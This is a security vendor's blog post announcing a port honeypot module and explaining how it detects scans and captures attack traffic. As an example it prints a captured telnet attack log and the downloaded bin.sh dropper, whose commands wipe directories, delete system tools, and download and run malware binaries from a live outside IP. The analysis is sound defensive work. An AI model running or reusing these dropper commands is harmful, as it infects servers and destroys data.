Port HoneyPot is ready for action

Viktoria Vereb

A long time ago, in a galaxy far, far away … Ohh wait, it’s just happening. Yeah, one of the most anticipated ninja modules, the ‘gorgeous’ Port Honeypot has been released.  I know what you are thinking now “How can it be gorgeous? But seriously, this is about a security function”.  Let me introduce you this sexy component of the ninja protection, even Winnie the Pooh can’t say No to it.

More about Port Honeypot

This is a general honeypot module. After activating this module will set up 100 honeypots on your server on random ports chosen from the 1.000 most popular ports. It will detect, if someone does a deep port scan on your server (except syn stealth scan and some others), and also capture any traffic on these honeypots, so when the attacker tries to exploit one of these fake services, it will generate incidents. This is a very effective way to early catch attacks and botnet activities.

Port Honeypot does not bind on the actual ports, but binds on a port above 60.000 and uses iptables rules to forward from the actual ports. We use this to avoid any port to be blocked from real services. If there is a daemon starts listening a honeypot port, the module will automatically stop using that port as honeypot. When the module starts, it also lists all open sockets in listening mode, and won’t start honeypot on active ports. This way the module will automatically avoid any collision with real services. If you want, you can set ports to always use for honeypot purposes and you can set up ports that you never want to be used as honeypot.
Read more about how to configurate this module and also the chat scripts which can be used for faking services even more realistically >> Yeah let’s go to the documentation

(For customers: The new feature version is out, ready to manually update. We will auto update it for you on Thursday.)

Fun facts

We have captured more than 10 000 incidents on 5 test servers with this new module.

{
"PORT HIT": "189.14.202.110:51313->178.22.62.146:23",
"MESSAGES": "Array
(
[21:39:23] => sh

[21:39:27] => cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://74.118.193.239/bin.sh; sh bin.sh; wget1 http://74.
[21:39:30] => cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://74.118.193.239/bin.sh; sh bin.sh; wget1 http://74.

 

This is a good example of a malicious request captured by the Port HoneyPot module. You can see clearly that the attacker is trying to run a shell (sh) and then a long command. The long command does basically this:

  1. Try to cd into one of /tmp, /va/run, /dev/shm, /mnt /var whichever possible first.
  2. Move the /usr/bin/-wget executable to /usr/bin/wget, and try the same in /usr/sbin and /usr/bin
  3. Using the wget program it tries to download a script form the given c&c server, and execute it using the default shell interpreter.

What is inside the bin.sh script? We have downloaded this script for you:

#!/bin/bash
rm -f *
busybox rm -rf /tmp/*
busybox rm -rf /root/*
busybox rm -rf /usr/bin/strings
busybox rm -rf /usr/bin/ps
busybox wget http://74.118.193.239/10; busybox chmod +x 10; ./10; busybox rm -f 10*
rm -f *
busybox wget http://74.118.193.239/11; busybox chmod +x 11; ./11; busybox rm -f 11*
rm -f *
busybox wget http://74.118.193.239/13; busybox chmod +x 13; ./13; busybox rm -f 13*
rm -f *
busybox wget http://74.118.193.239/14; busybox chmod +x 14; ./14; busybox rm -f 14*
rm -f *
busybox wget http://74.118.193.239/15; busybox chmod +x 15; ./15; busybox rm -f 15*
rm -f *
busybox wget http://74.118.193.239/16; busybox chmod +x 16; ./16; busybox rm -f 16*
rm -f *
busybox wget http://74.118.193.239/17; busybox chmod +x 17; ./15; busybox rm -f 17*
rm -f *

busybox wget http://74.118.193.239/10; busybox cp /bin/busybox ./; busybox cat 10 > busybox; busybox rm -f 10; busybox cp busybox 10; busybox rm -f busybox; ./10; busybox rm -f 10*
rm -f *
busybox wget http://74.118.193.239/11; busybox cp /bin/busybox ./; busybox cat 11 > busybox; busybox rm -f 11; busybox cp busybox 11; busybox rm -f busybox; ./11; busybox rm -f 11*
rm -f *
busybox wget http://74.118.193.239/13; busybox cp /bin/busybox ./; busybox cat 13 > busybox; busybox rm -f 13; busybox cp busybox 13; busybox rm -f busybox; ./13; busybox rm -f 13*
rm -f *
busybox wget http://74.118.193.239/14; busybox cp /bin/busybox ./; busybox cat 14 > busybox; busybox rm -f 14; busybox cp busybox 14; busybox rm -f busybox; ./14; busybox rm -f 14*
rm -f *
busybox wget http://74.118.193.239/15; busybox cp /bin/busybox ./; busybox cat 15 > busybox; busybox rm -f 15; busybox cp busybox 15; busybox rm -f busybox; ./15; busybox rm -f 15*
rm -f *
busybox wget http://74.118.193.239/16; busybox cp /bin/busybox ./; busybox cat 16 > busybox; busybox rm -f 16; busybox cp busybox 16; busybox rm -f busybox; ./16; busybox rm -f 16*
rm -f *
busybox wget http://74.118.193.239/17 busybox cp /bin/busybox ./; busybox cat 17 > busybox; busybox rm -f 17; busybox cp busybox 17; busybox rm -f busybox; ./17; busybox rm -f 17*
rm -f *

exit

 

So, the next question is, what contains the http://74.118.193.239/10, and the other 7 files ? We have downloaded them, too. They are malware/virus files. The bin.sh script will download and execute them, then it deletes the file itself, but the viruses remian in memory.

This is a good example of attack BitNinja Port Honeypot is able to automatically save your server against.

Happy hacker hunting! BitNinja will be always there for you

Sign up for the 7-day BitNinja trial, and let the Port HoneyPot get the hunting party started.

Share your ideas with us about this article

Previous posts

0-Day Attack – How to protect?
The holidays are over already, and hackers didn’t sleep at all during that time. Yeah, a critical Joomla vulnerability is on board again. To tell the truth, this 0-day remote command execution vulnerability is already 3-weeks old, but it can still cause headache for owners using versions from 1.5 to 3.4. It is a quite dangerous security hole, maybe the worst type of attack you may face, as hackers can easily manipulate your server this way. And even worse: the patch was released only after 2 days. It has been exploited in the wild. As the BitNinja security system is continuously moni...
Year in Review: 2015 Highlights
2015 was a big year both for our team and for you who use BitNinja on your servers to make the Internet a safer place. We are so proud of our community, full of committed and passionate hacker hunters. A lot has happened this year and now, nearing the end of it, it feels good to look back with a little nostalgy. Let’s see a brief summary about what happened to us in 2015: #LifeAfterBeta After a half-year Beta, BitNinja Server Security launched successfully on March 23.  And 78% of the beta servers turned into subscriptions straightaway. Right after this illustrious date...